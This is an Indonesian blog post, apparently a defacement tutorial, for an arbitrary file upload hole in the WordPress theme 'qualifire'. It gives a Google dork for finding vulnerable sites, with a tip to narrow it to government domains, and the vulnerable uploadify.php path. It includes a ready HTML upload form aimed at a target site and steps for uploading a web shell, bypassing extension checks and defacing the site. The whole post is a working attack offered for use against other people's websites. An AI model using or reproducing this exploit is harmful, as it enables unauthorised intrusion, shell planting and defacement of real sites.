Deface wordpress Arbitry file upload with Csrf
-Wordpress merupakan Cms yg populer karena banyak fitur yg berguna tapu di balik itu semua banyak celah yg di manfaatkan untuk melakukan hacking atau deface
<============================================================================÷===÷÷÷÷÷÷÷÷÷÷÷=====
-Dork=inurl:"/wp-content/themes/qualifire"
bisa juga kalian kembangkan dorknya dengan menambahkan site misalnya site:gov
___________________________________________________________________________________________
-Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
-CSRF :
<html>
<title>CSRF Wp-Qualifire</title>
<h1 style="background:black; color:aqua; padding:3px 5px;">CSRF Exploiter Wordpress arbitary file upload</h1>
<form
action="http://situs-target/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
========================================================================
Langkah-Langkah:
1.Dorking di google lalu pilih web yg vuln
2.Lalu Masukan Exploitnya www.site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Jika Tampilan Web yg Blank/kosong Berarti Vuln Di upload dengan Csrf note:bukan not found
3.masuk ke csrf lalu isi Target webnya dan save ekstensi html dan buka Csrf Di browser.
4.lalu upload html/php atau jpg..biasanya support jpg,txt tapi kalian bisa coba bypas shell kalian.
Jika terupload maka seperti ini tampilanya
5.lalu panggil Shell/gambar yg kamu upload
cara manggilnya www.situs-target.com/namefile.jpg
oke itu dia..gampang bukan..saya juge pernah lihat beberapa orang berhasil up shell dan nebas webnya karena mereka maen bypas ekstensi shell..jadi jangan berfikir kalo ga bisa up shell gan..
Belum ada Komentar untuk "Deface wordpress Arbitry file upload with Csrf"
Posting Komentar